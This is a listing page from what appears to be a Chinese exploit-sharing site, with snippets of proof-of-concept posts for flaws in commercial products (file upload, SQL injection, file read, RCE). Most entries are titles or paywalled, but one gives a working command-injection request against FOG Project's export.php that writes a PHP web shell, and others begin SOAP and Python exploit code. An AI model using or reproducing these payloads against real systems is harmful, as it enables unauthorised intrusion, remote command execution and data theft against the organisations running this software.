POC_秃兔安全

更新

浏览

用友-畅捷通CRM-任意文件上传

2024你懂的

秃兔5个月前

0535

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...

2024你懂的

秃兔5个月前

0415

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容

2024你懂的

秃兔5个月前

0585

【通用】龙腾码支付 payservicecurl 任意文件读取漏洞

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2926天前

0465

华天动力-OA-downloadWpsFile任意文件读取

2024你懂的

秃兔5个月前

0625

1Panel面板前台RCE漏洞

2024你懂的

秃兔5个月前

0545

喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞

2024你懂的

秃兔5个月前

0775

【通用】万能门店小程序sql注入漏洞

fofa body=yakit插件 uuid经过科研发现有些存在的系统有的可以使用报错注入有些只能使用延时注入，于是两种检测方式都写上了，所有可能会误报。pocyakitnuclei已验证

付费阅读500 # poc # yakit # nuclei

dreamer2925个月前

02073

【通用】某电子资料管理系统RCE漏洞

fofa body=''yakit插件 uuidpocyakitnuclei已验证nuclei

付费阅读500 # poc # yakit # nuclei

dreamer2925个月前

0851

浪潮云财务系统存在命令执行

POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1Host:Content-Type: text/xml; charset=utf-8Content-Length: 16396SOAPAction: “http://tempu...

2024你懂的 # poc

秃兔5个月前

0660

上一页 1…35 363738 下一页跳转